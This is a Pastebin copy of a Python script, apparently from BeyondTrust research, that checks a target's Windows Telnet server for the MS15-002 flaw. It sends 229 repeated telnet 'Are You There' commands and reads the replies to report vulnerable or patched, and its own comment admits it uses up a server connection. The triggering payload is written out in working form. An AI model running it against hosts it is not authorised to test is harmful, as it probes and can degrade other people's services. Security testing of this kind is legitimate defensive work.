Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # BeyondTrust Research MS15-002 Checker
- # Note this checker is not safe in that it will exhaust 1 connection as defined in
- # Software\\Microsoft\\TelnetServer\\1.0\\MaxConnections
- import binascii
- import socket
- import random
- import time
- import sys
- import os
- NUM_COMMANDS = 229
- COMMAND = "f6"
- PORT = 23
- HOST = ""
- def printBanner():
- print "----"
- print "BeyondTrust MS15-002 Checker"
- print "----"
- def usage():
- print os.path.basename(sys.argv[0]) + " <target>"
- def getPayload():
- evil = ""
- for i in xrange(0,NUM_COMMANDS):
- evil += "ff" + COMMAND
- return evil
- def main():
- printBanner()
- if len(sys.argv) < 2:
- usage()
- exit(1)
- HOST = sys.argv[1]
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(5.0)
- try:
- s.connect((HOST, PORT))
- except:
- print "[E] Could not establish connection"
- s.close()
- exit(1)
- s.send(binascii.unhexlify(getPayload()))
- try:
- sessionSetupResponse = s.recv(256)
- except:
- # no response to initial packet, bail
- print "[E] Unable to contact telnet server"
- s.close()
- exit(1)
- ayt_resp = ""
- try:
- ayt_resp = s.recv(2048)
- except:
- print "[*] VULNERABLE"
- s.close()
- exit(1)
- if ayt_resp.lower().count("yes") == 227: #this will also avoid inetutils (will return 229 yes)
- print "[*] Patched"
- s.close()
- if __name__ == "__main__":
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement